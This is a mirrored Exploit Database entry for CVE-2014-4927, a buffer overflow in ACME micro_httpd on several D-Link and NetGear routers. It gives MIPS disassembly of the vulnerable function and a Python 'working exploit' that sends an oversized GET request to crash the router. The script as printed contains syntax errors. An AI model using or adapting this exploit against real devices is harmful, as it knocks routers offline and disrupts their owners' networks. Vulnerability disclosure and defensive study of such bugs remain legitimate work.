ACME micro_httpd – Denial of Service

• Exploit Database
• 16 阅读

• 作者： Yuval tisf Nativ
  日期： 2014-07-18
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/34102/

• """
  # Exploit Title: Buffer Overflow in micro_httpd by ACME
  # Date: 4/7/2014
  # Exploit Author: Yuval tisf Nativ
  # Vendor Homepage: http://www.acme.com/software/micro_httpd/
  # Software Link: http://www.acme.com/software/micro_httpd/
  # Version: June 2012
  # CVE: CVE-2014-4927
  # Tested on: D-Link: (DSL2750U, DSL2740U), NetGear: (WGR614, MR-ADSL-DG834)
  
  Buffer Overflow in micro_httpd
  
  Argument for GET method is vulnerable to a buffer overflow.
  Analyzed on:
  D-Link: DSL2750U, DSL2740U,
  NetGear: WGR614, MR-ADSL-DG834
  
  ACME Labs offer no version tracking on server versions so version might not
  be accurate.
  
  Disassmebly in MIPS of vulnerable flow:
  sub_4067CC:
  
  LOAD:004067CC
  LOAD:004067CC lui $gp, 0x47
  LOAD:004067D0 addiu $sp, -0xA0
  LOAD:004067D4 li$gp, 0x46B850
  LOAD:004067D8 sw$ra, 0xA0+var_4($sp)
  LOAD:004067DC sw$s3, 0xA0+var_8($sp)
  LOAD:004067E0 sw$s2, 0xA0+var_C($sp)
  LOAD:004067E4 sw$s1, 0xA0+var_10($sp)
  LOAD:004067E8 sw$s0, 0xA0+var_14($sp)
  LOAD:004067EC sw$gp, 0xA0+var_88($sp)
  LOAD:004067F0 lui $s0, 0x46
  LOAD:004067F4 lw$v1, dword_464108
  LOAD:004067F8 lw$t9, (off_463B24 - 0x46B850)($gp)
  LOAD:004067FC move$v0, $a0
  LOAD:00406800 sw$a1, 0xA0+var_90($sp)
  LOAD:00406804 move$s2, $a2
  LOAD:00406808 lui $a1, 0x44
  LOAD:0040680C lui $a2, 0x44
  LOAD:00406810 move$a0, $v1
  LOAD:00406814 la$a1, aSDS# "%s %d %s\r\n"
  LOAD:00406818 la$a2, aHttp1_1# "HTTP/1.1"
  LOAD:0040681C move$s1, $a3
  LOAD:00406820 jalr$t9
  LOAD:00406824 move$a3, $v0
  LOAD:00406828 lw$gp, 0xA0+var_88($sp)
  LOAD:0040682C lw$a0, dword_464108
  LOAD:00406830 lw$t9, (off_463B24 - 0x46B850)($gp)
  LOAD:00406834 lui $a2, 0x44
  LOAD:00406838 lui $a1, 0x44
  LOAD:0040683C la$a2, aMicro_httpd# "micro_httpd"
  LOAD:00406840 jalr$t9
  LOAD:00406844 la$a1, aServerS# "Server: %s\r\n"
  LOAD:00406848 lw$gp, 0xA0+var_88($sp)
  LOAD:0040684C lw$a1, 0x4108($s0)
  LOAD:00406850 lw$t9, (off_463BCC - 0x46B850)($gp)
  LOAD:00406854 lui $a0, 0x44
  LOAD:00406858 jalr$t9
  LOAD:0040685C la$a0, aCacheControlNo# "Cache-Control:
  no-cache\r\n"
  LOAD:00406860 lw$gp, 0xA0+var_88($sp)
  LOAD:00406864 move$a0, $0
  LOAD:00406868 lw$t9, (off_463CDC - 0x46B850)($gp)
  LOAD:0040686C jalr$t9
  LOAD:00406870 addiu $s3, $sp, 0xA0+var_7C
  LOAD:00406874 lw$gp, 0xA0+var_88($sp)
  LOAD:00406878 addiu $a0, $sp, 0xA0+var_80
  LOAD:0040687C lw$t9, (off_463DF4 - 0x46B850)($gp)
  LOAD:00406880 jalr$t9
  LOAD:00406884 sw$v0, 0xA0+var_80($sp)
  LOAD:00406888 lw$gp, 0xA0+var_88($sp)
  LOAD:0040688C lui $a2, 0x44
  
  
  
  Working Exploit for a Denial of Service:
  """
  
  #!/bin/python
  import socket
  import struct
  
  # This will crash the router.
  # In some devices it takes about 10 minutes until functionality is
  restored.
  
  buffer = "\x41" * 6000# Original fuzzing buffer.
  host = "10.0.0.138"
  
  s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host, 80))
  
  payload = GET /" + buffer + " HTTP/1.1\r\n"
  payload += ("Host: %s \r\n\r\n", % host)
  
  s.send(payload)
  s.close()